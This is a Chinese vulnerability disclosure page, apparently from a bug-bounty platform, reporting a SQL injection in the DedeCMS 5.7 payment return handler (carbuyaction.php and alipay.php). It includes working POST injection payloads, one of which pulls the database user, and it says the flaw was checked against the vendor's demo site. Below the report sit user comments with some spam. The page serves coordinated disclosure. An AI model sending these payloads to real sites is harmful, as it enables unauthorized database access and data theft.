漏洞概要
关注数(24)
关注此漏洞
漏洞标题:DedeCMS-V5.7-UTF8-SP1 sql注入
提交时间:2014-06-06 17:31
修复时间:2014-09-04 17:32
公开时间:2014-09-04 17:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-06-06: 细节已通知厂商并且等待厂商处理中
2014-06-06: 厂商已经确认,细节仅向厂商公开
2014-06-09: 细节向第三方安全合作伙伴开放
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-09-04: 细节向公众公开
简要描述:
DedeCMS-V5.7-UTF8-SP1 代码审计sql注入
详细说明:
织梦在/include/payment/alipay.php(lines:125-161)
其中大家可以看到137行直接通过$_GET获取订单号: $order_sn = trim($_GET['out_trade_no']); 这里并没有做任何处理,但是奇怪的是上面有个require_once地方只要这里引入,就不会继续往下执行,只有两种可能性,要么是程序支付逻辑接口缺陷,要么就是需要其他外界条件,我们暂且注释掉这一行 //require_once DEDEDATA.'/payment/'.$code.'.php';
下来我们看文件/uploads/plus/carbuyaction.php(lines:334-337)
走到这里我们一下明白了整个支付逻辑,然后我们构造请求如下: url:http://localhost/DedeCMS-V5.7-UTF8-SP1/uploads/plus/carbuyaction.php post_data:dopost=return&code=alipay&out_trade_no=S-P0098RN0098' 后台监控到的sql语句为: SELECT * FROM dede_shops_orders WHERE oid = 'S-P0098RN0098'' LIMIT 0,1 看到此处大家都明白了,所以可能是自己没有办法去操作一整套支付流程,也可能是织梦支付接口缺陷导致 到这里位置,唯一可以肯定的就是,这一段代码肯定是有问题,而且是大问题,目前还在挖取,相关织梦已建站这一块
漏洞证明:
为了验证自己的猜想,我们上官方的演示站点:
http://v57.demo.dedecms.com/plus/carbuyaction.php
url:http://localhost/DedeCMS-V5.7-UTF8-SP1/uploads/plus/carbuyaction.php post_data:dopost=return&code=alipay&out_trade_no=M1T1RN1' or concat(char(@`'`),(SELECT user())))#
证实逻辑完全符合猜想:
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2014-06-06 19:41
厂商回复:
已修复,感谢提交
最新状态:
暂无
漏洞评价:
评论
-
2014-06-06 17:33 |
dlevr ( 实习白帽子 | Rank:33 漏洞数:10 | 菜鸟一只,大神勿喷!)
-
2014-06-06 17:37 |
邪恶大咖 ( 路人 | Rank:0 漏洞数:3 )
-
2014-06-06 17:37 |
MeTeOrs ( 路人 | Rank:4 漏洞数:4 | 永远不要以正常的思维对待你的目标!)
-
2014-06-06 17:40 |
bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)
-
2014-06-06 18:57 |
帅爆的小烬烬 ( 路人 | Rank:30 漏洞数:25 | 路上有个漂亮妹子和我搭讪,知道我赶着去挖...)
前排观望,本人帮刷QB支付50¥刷10QB,欢迎联系
-
2014-06-06 19:03 |
小鸡鸡 ( 实习白帽子 | Rank:40 漏洞数:10 )
找个玩渗透网站的、教我玩渗透、我给他8位qq和情侣qq。(qq都是04年和05年前的。
-
2014-06-06 19:37 |
小权 ( 路人 | Rank:4 漏洞数:3 | 小菜鸟,求各位大姐大哥多多指教)
卧槽,楼上都是大牛,后排出售瓜子,可乐,优乐美。。。
-
2014-06-06 19:43 |
Byakuya ( 路人 | Rank:17 漏洞数:3 | /whitehat_detail.php?whitehat=Byakuya)
-
2014-06-07 10:14 |
五色花 ( 路人 | Rank:0 漏洞数:1 | jvav)
-
2014-06-08 18:53 |
暧昧 ( 路人 | Rank:6 漏洞数:3 | 此号乃是吾用来装孙子也)
-
2014-06-09 11:01 |
奋斗的猴子 ( 路人 | Rank:2 漏洞数:1 | IT界的一名屌丝)
-
2014-06-10 07:31 |
07@jyhack.com ( 路人 | Rank:14 漏洞数:10 | 希望和大家多多交流,多多沟通、)
卧槽,楼上都是大牛,后排出售瓜子,可乐,优乐美。。。
-
2014-06-10 09:12 |
by:龙少 ( 普通白帽子 | Rank:304 漏洞数:74 | 信息安全,学习、进步、共勉!)
卧槽,楼上都是大牛,后排出售雪碧,可乐,优乐美。。。
-
2014-06-10 10:31 |
xiaoshi ( 路人 | Rank:7 漏洞数:2 )
-
2014-06-12 11:20 |
BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )
-
2014-06-12 15:33 |
123丶 ( 路人 | Rank:2 漏洞数:2 | 初学菜鸟一只,请多指教)
-
2014-07-18 12:52 |
pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)
-
2014-11-22 19:57 |
小菜大师 ( 路人 | Rank:0 漏洞数:1 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)